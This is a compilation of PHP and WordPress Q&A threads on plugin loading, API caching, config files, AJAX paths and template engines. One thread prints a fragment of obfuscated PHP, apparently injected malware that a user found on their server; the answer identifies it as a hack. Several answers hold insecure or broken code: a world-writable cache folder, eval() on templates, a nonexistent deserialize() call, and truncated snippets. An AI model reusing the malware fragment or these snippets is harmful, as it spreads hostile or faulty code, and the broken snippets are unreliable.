Lighten my cms loading - php

I am creating a cms system and so far so good. But as i go further with my project i develloped alot of plugins for my cms like a guestbook, calendar, comments, events, blog,...
Now every plugin is loaded in my index.php file with the require function.
A plugin gets loaded like this.
require 'plugins/counter/counter.php';
$counter = ob_get_clean();
and the plugins gets displayed only on the pages with the correct TAG like this
$template = file_get_contents('./templates/' . $default_template . '/template.php');
$search = array('[[SITE_TITLE]]', '[[PAGE_TITLE]]', '[[PAGE_CONTENT]]', '[[MENU_LINKS]]', '[[DEFAULT_TEMPLATE]]', '[[COUNTER]]');
$replace = array($site_title, $page_title, $page_content, $newresult, $default_template, $counter);
echo $template
Now, this is the main structure, but in the last few months i have like 35 plugins now. The require plugins gets heavy and i am affraid that my website will go slow with lots of traffic.
Is there an other way i can "require" all the plugins but with less effect on my website speed?
thx for any suggestions. I have been looking arround here but found no solution yet.

There is no silver bullet for optimization. I suggest you turn on Xdebug profiler and find the bottleneck. Then eliminate it.
Also you can follow some common optimization techniques.
A good resource on Tactics for using PHP in a high-load site
A page from Google.

You can use magic autoload function to require classes only when necessary. Check out:


Strange PHP code found in file on server

Sorry if this is the wrong site to post on.
Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3##G9CJJ");
${YkT1GO68Y3rXB(",g0##&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh\"Co[")} = lpkBre6("*77#0>A-DE6#6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");
I have never seen code like this before. Can anyone tell me what it is exactly doing?
This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.
You should remove this code and update all your plugins.
Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.
If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.
Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from

Make WordPress WP-API faster by not loading theme and plugins

I would like to make requests to the WordPress API much faster. My API is implemented in a plugin (using register_rest_route to register my routes). However, since this is a plugin, everything is loaded with it (the child-theme and the theme) and basically a query to this API is taking half a second because of all this useless parts loaded.
Doesn't WordPress API can be used in another way? Since most plugin making use of the WP-API doesn't need any other plugins to be loaded, even less a theme... I don't understand how they could miss that.
Is there anyway to do this?
Yes, it is possible. In one of my plugins where I need the minimal WordPress core (DB without plugins & themes) here is what I do:
define('SHORTINIT', true); // load minimal WordPress
require_once PATH_TO_WORDPRESS . '/wp-load.php'; // WordPress loader
// use $wpdb here, no plugins or themes were loaded
The PATH_TO_WORDPRESS constant I made up; you just need to point that to the correct path. In plugins for example, it might look like:
require_once dirname(__FILE__) . '/../../../wp-load.php'; // backwards 'plugin-dir/plugins/wp-content'
Setting SHORTINIT to true certainly does help performance a bit.
With WP_DEBUG disabled, the time it takes to bootstrap WordPress are as follows:
Without SHORTINIT: ~0.045 seconds
With SHORTINIT: ~0.0015 seconds
If this is for your own site where you demand performance, you can probably increase this a bit by enabling an OpCache (e.g. APC or PHP OpCache in recent versions).
But I believe the 2 lines of code above to define SHORTINIT and require wp-load.php are what you're looking for.
To clarify, this file is a part of a plugin, but it is called independently of WordPress itself (via Ajax and directly). It never gets included or used by any other parts of the plugin or WP itself.
EDIT: Since the OP is actually concerned with the WP-API, not WordPress in general, I am adding this to address the actual question. I'll leave the original answer content in case it can help someone else.
I did further testing with the WP API and like #David said in his answer, the issue is probably something else.
I loaded up 12 plugins in addition to the rest api, some fairly "large" plugins, and my local install has about 25 themes installed (one active of course). I edited WordPress' index.php file and used microtime(true) to record when everything started, and then edited one of the REST controllers to calculate how long it took from start to getting to the API endpoint.
The result on my system is consistently around 0.0462 - 0.0513 seconds (no PHP OpCache, and no other system load). So it appears bootstrapping all of WordPress has little impact on performance.
If the requests are taking half a second, the bottleneck is elsewhere and cutting out plugins and themes is going to have minimal impact. At least this is what I found.
I think you might be focusing on the wrong issue.
Loading php files is not nearly as slow as reading from your db and this is likely to be your 500ms load time. You should actually look at reducing this anyway (cache wp-options, etc), but what i suggest to you in relation to the api, is to cache the output using a mu-plugin. Using exit we can load output from file and serve that instantly.
Our Method:
1. Create a folder called mu-plugins in the wp-content folder (may already be there)
create a file called api-cache.php
enter this code into your file:
function get_api_cache(){
//dont run if we are calling to cache the file (see later in the code)
if( isset($_GET['cachecall']) && $_GET['cachecall'] === true)
//do a little error checking
$uri= explode('/',$url);
//we have a array (1st key is blank)
if( $uri[1] !== 'wp-json' || $uri[2] !== 'wp' || $uri[3] !== 'v2'){
//lock down the possible endpoints we dont want idiots playing with this...
$allowed_endpoints= array(
$endpoint= array_pop($uri); // not sure if this is valid or not, is there more structure to some api calls?
if( !in_array( $endpoint, $allowed_endpoints) ){
//ok reasonably confident its a api call...
$cache_folder= get_stylesheet_directory().'/api_cache/';
// prob best if not within php server but to get you going
if(! file_exists ( $cache_folder ) ){
mkdir($cache_folder); //warning 777!!
* Need to choose a method of control for your cached json files
* you could clear out the folder on update post/ taxonomies etc
* or cron clear out hourly/weekly whatever freq you want
if( file_exists($cache_folder.$endpoint.'.json') ){
$json= file_get_contents($cache_folder.$endpoint.'.json');
header('Content-Type: application/json');
echo $json;
exit;// we need nothing else from php exit
} else {
//make sure there will be no errors etc..
$ch = curl_init();
$url= "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]?cachecall=true";
$timeout= 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$json = curl_exec($ch);
file_put_contents($cache_folder.$endpoint.'.json', $json);
Now you should notice a significant difference on your load time on the 2nd load (this first time it is caching the output).
A few disclaimers:
you should read the comments in the code
You need curl
You need to be aware the cache folder is 777, I would strongly suggest you move this away from your theme folder and preferably outside your http accessible files.
There were no catch all hooks to capture the data to be cached, hence i used curl to grab the content, this may change in the future and a hook/filter would improve the process time a bit when creating the cache file.
I have not included a method to update cache files. You need to decide on how often you want to update, a site that gets lots of posts per day and a lot of visits, you might do a cron job to just delete the files (e.g. 3 times a day, hourly, every 10 minutes, etc-- what is a reasonable tradeoff in update time?) or add a hook to save post to only update when your posts change, etc..
add your endpoints to the array for them (you can remove the if statement to allow all endpoints, but then you may have a situation where 404s are being cached!)
You should give this a try this. It is a plug-in that allows you to enable/disable certain plug-ins for post-types, pages and other circumstances.
For the theme part, if you wrote it, it would be easy to add something in the function.php to prevent it from attaching any hooks or filters in the case of an API request.
As a sidenote, couldn't you query de DB directly?
Sorry for my poor english if this is helpful for you.
Put the plugin folder in root wordpress install.
and include wordpress main file.
require dirname( dirname( __FILE__ ) ).'/wp-load.php';
Or in plugin folder directly access
require_once dirname(__FILE__) . '/../../../wp-load.php';
Before check wp-load.php file included properly and working.
wp-settings.php file load whole core, plugins and themes files. wordpress is load first mu-plugins files (wp-content/mu-plugins/) and provide after action hook muplugins_loaded. Trigger this action to exit whole other files loaded. You can also find which action hook is provide before muplugins_loaded and stop other files and script execution.
if define constant SHORTINIT before include wp-load.php its includes
some files provide DB,plugin or basic functions. When we want more load core files and not just want load plugins and theme files in this way found a solution.
// file my-plugin.php
//call before include file wp-load.php
global $wp_filter;
$wp_filter = array(
// pass wp hook where to want exit extra wp loaded
'muplugins_loaded' => array(
// prority
1 => array(
// callback function register
'wp_extra_loaded_exit' => array(
'function' => 'wp_extra_loaded_exit',
'accepted_args' => 1
function wp_extra_loaded_exit(){
require dirname( dirname( __FILE__ ) ).'/wp-load.php';
// plugin code here.
We check muplugins_loaded hook is define wordpress early you can also find which hook is define before muplugins_loaded then stop this point to after load more wordpress files. -
When you want to test your script open file wp-settings.php and find string muplugins_loaded then echo statement to check.
echo "Wordpress loaded in this point before";
do_action( 'muplugins_loaded' );
echo "After this wordpress not loading"; // Output fail bcz we exit

Using define() when mass building, Pros? Cons?

I mass produce very similar sites, meaning they all use the same basic components, pages and are all single industry specific. These are my low end deeply discounted site designs. None of these sites ever get more than 20-30 visitors a day, so any extra load on the server isn't an issue.
In the interest of time, being that they all use the same components, though they may be in different locations or in a different order I would like to write one definition file that can be included with every site, so I can just call the defined constant instead of writing out the code a couple hundred times every year on every site I build. Also for editing later purposes this would make my life MUCH easier.
the definition file would look similar to the following:
define('UPCONTACT','<h1>Contact Us</h1>');
define('ULCONTACT','Contact Us');
define('UPABOUTUS','<h1>About Us</h1>');
define('ULABOUTUS','About Us');
Obviously this is a very basic example but I think you get the idea.
So the question is what are the pros and cons of using define() in this manner?
It's pretty much ok. The disadvantage is that, given you are using constants, you can't override them for a single page or site.
Use an array instead:
return array(
'aboutus' => '<h1>About Us</h1>',
'contactus' => 'Contact Us'
include it like this in your site:
$config = include('config.php');
Then you can print it very easily
<?php echo $config['aboutus'] ?>
You can also change a value when you need it:
$config = include('config.php');
$config['aboutus'] = '<h1>About My Company</h1>';
This is probably your best option.
It has upsides and downsides.
The upsides involve that such way is quicker than loading settings from a database (and creating a database; and creating an abstraction layer, ...).
The downsides involve that such way is not customizable by the client. If they need a change, ensure beforehand the website is static and you will charge them by every change.
IMHO it is better to have some stuff as customizable by the client, and other stuff not. But there's no technical issue at all by using define() in that way (except perhaps allowed datatypes).
A better way to use a ini file or something like that.
(and easily editable from a smartphone if it's a recursive task for you :)
Look for a builtin php function, can make simplify your life
or if you would a more stronger and flexible system,
go for templating (looking for smarty, or self made regex templating)
Looking for my first regex function (loong years ago)
Quitting Smarty to do it manually
Using Constant does not provide you to dynamically modifying them
inline code, and are poor supported type (you cannot store an array without serialize for example)
I would suggest cascaded ini files:
$conf_dir = dirname(__FILE__);
$config = array_merge_recursive(
The benefits are readability, inability of execution (I like to lock things down that can be), and you can track the base ini in git (or whatever you use) and not the client one. There are some downsides, but such is life. The just feel cleaner, but they are not faster than .php, to be sure.
And if you wanted to eliminate any redundant execution (listen, any "performance benefit" still has "benefit" in it), serialization:
define('CACHE_DIR', '/tmp/');
// where 'http' is a path part that directly follows the app root, and will always
// be below where this file is called from.
$ini_cache = CACHE_DIR.'config.ser';
if(!file_exists($ini_cache)) {
// Build your config in any way you wish.
$conf_dir = dirname(__FILE__);
$config = array_merge_recursive(
// Store it serialized
file_put_contents($ini_cache, serialize($config));
} else {
$config = deserialize(file_get_contents($ini_cache));
You can get more creative with this, but essentially, this allows you to store/generate your configuration in any way you wish. If you wanted to not have to delete the serialized cache on every change, you could add an atime check:
define('CACHE_DIR', '/tmp/');
// where 'http' is a path part that directly follows the app root, and will always
// be below where this file is called from.
$ini_cache = CACHE_DIR.'config.ser';
$conf_dir = dirname(__FILE__);
$config = array();
if(file_exists($ini_cache)) {
$client_stat = stat($conf_dir.'client.ini');
$cache_stat = stat($ini_cache);
if($client_stat['atime'] < $cache_stat['atime']) {
$config = deserialize(file_get_contents($ini_cache));
if(empty($config)) {
// Build your config in any way you wish.
$config = array_merge_recursive(
// Store it serialized
file_put_contents($ini_cache, serialize($config));
With either serialization method, you can use what ever $config generation scheme you prefer, and if you use PHP, you can even get real creative/complicated with it, and the cached hit to the page will be negligible.

Context-aware AJAX call in a modular site

Edit: I thought about a possible solution, but I made another question as it is very specific: see AJAX proxy with PHP, is it possible?
A couple of times I've encountered this problem...
I create sites that have a certain degree of modularity. So, it is possible that there are "components" (think of a rough CMS) which carry their own PHP code, CSS, and JavaScript, all dynamically included. Think about a structure like:
Now, the question is: for JavaScript files, and expecially AJAX calls, how do I make them context-aware with the URLs?
For example, if in datagrid.js I want to call siteroot/component/datagrid/ajax/getsomedata.php with AJAX I should write (with JQuery):
First problem: siteroot changes on different installations. I've managed that by including a general
var codeBase = <? echo json_encode(Config::$siteRoot); ?>
with PHP on every page, from a Config file that can be easily edited for every installation, so I can do with whatever JavaScript something like:
$("#ajax").load(codeBase + "/component/Datagrid/ajax/getsomedata.php");
What do you think of this approach?
Second problem: but I have PHP functions that return to me also the components folder, or the folder of other components. It would be nice to make the whole URL dynamic. This would account also for changes in the structure of the component if I want.
The only solution I've found is to use a .js.php dynamic Javascript. This is very unelegant, and I have to include all the framework in the JavaScript file, like:
include "../../libs/framework.php"; // get my functions...
$myUrl = Config::$siteRoot . Framework::getComponentAjaxDir("datagrid") . "/getsomedata.php";
Another side effect is that I have to know exactly the include the path for framework.php... I don't want this so hard-codedin my ".js.php" file.
Any smart solutions about that?
As nobody answered in a suitable way, I answer to myself to provide a solution I've found out that can be useful.
The key to my solution is simple:
I create an AJAX proxy at a fixed location in my site structure, so I can use codeBase to reference the proxy from JavaScript
I call this proxy with two parameters: plugin and action, which identify a) the plugin folder in which the "real" ajax is and b) the ajax file to use, along with the other params:
$("#...").load( codeBase + "/main/ajax.php?plugin=Datagrid&action=gettable&otherparams"...)
In ajax.php I sanitize the parameters, and use plugin and action to obtain the "real" ajax file:
Then i simply include that file in ajax.php
To be honest your problems are realistic options and aren't that bad practice in general quite frankly.
But let's explore this a little further.
What would be the best approach is for you to have 1 main config.php file which you can then specify modules, i.e. your datagrid etc.
You could store all modules in an array variable like so:
$_SITE_PATH = "/var/www/html/";
$_HTTP_PATH = "";
$_MODULES_PATH = $_SITE_PATH."modules/"
$_MODULES = array(
Each module would have it's own directory with instantiation init.php so that it would load all it required to get going.
This way you could code as you liked and when you needed something (preferably in the header state) do something like this.
global $_MODULES;
Everything will be easily available as and when required without any variable path issues later down the line.

PHP Template Engine

I have been looking online for a tutorial to build a template engine. I know there are many engines that exist, like smarty, twig, and pattemplate, that could do exactly what I want, but I am looking to learn how to build one. I started with a template engine that added strings to an array and then displayed the array. Since then I built one using eval() (see below).
<// Define links & folders
define("ROOT_HTTP", "http://" . $_SERVER['HTTP_HOST'] . "/preprocessor");
define("TEMPLATE", "/template");
// Get the template file
$template = file_get_contents("template/template.php");
// Replace
$template = str_replace("<x Title x>", displayTitle(), $template);
$template = str_replace("<x Menu x>", displayMenu(), $template);
$template = str_replace("<x Content x>", displayContent(), $template);
$result = #eval("?>" . $template . "<?");
function displayMenu(){
return "Link1<br />" .
"Link2<br />" .
"Link3<br />";
function displayTitle(){
return "Site Title <?php echo date(\"m-d-y\", time()); ?>";
function displayContent(){
return file_get_contents("content.php");
It works fairly well but its not what I am looking to achieve. I would like to build something that is like the Joomla template with tags like <jdoc:include type="component" />. I would also like it to be able to handle errors inline meaning that it will display the line number of an error or when I call echo "text" it displays text in the correct position inside the template.
How do I create something along those lines? sounds very similar and has good code organization. if extension of mentioned system does not suit the needs, it would at least work as good tutorial
First of all: Immediately forget the idea about using a TE with XML-like tags. Really, it may look nice on the first glance but only causes too much work in the end and is really limiting.
Secondly I obviously recommend you to use Twig. It is clean, fast, extensible and offers all the features you need.
And lastly: I have written a small tutorial how to write a simple but powerful TE in another Stackoverflow question. It is really simple but for smaller projects it may suffice.
I cannot agree with NikiC's point of view.
XML is, although an old syntax, very powerful and brings a lot of advantages -- one of which is its similitude with properly written HTML.
There is nothing limiting in using an XML-based template syntax.
Besides, although Twig is, indeed, an excellent and famous project, it still lacks from a really good separation paradigm. It is still too dangerous and too easy to make mistakes from within the template and cause damages to the application as a whole.
Finally, the best template engine -- just as the best MVC framework -- is the one you feel really comfortable with.
I recommend having a look at FigDice]1, which was inspired by PHPTal, but takes things a few steps further, with an exclusive approach by giving the Web Designer (integrator, html-ist, etc.) a central position with the project -- much more flexible than the Twig-like approach.
I would be happy to read some feedback.
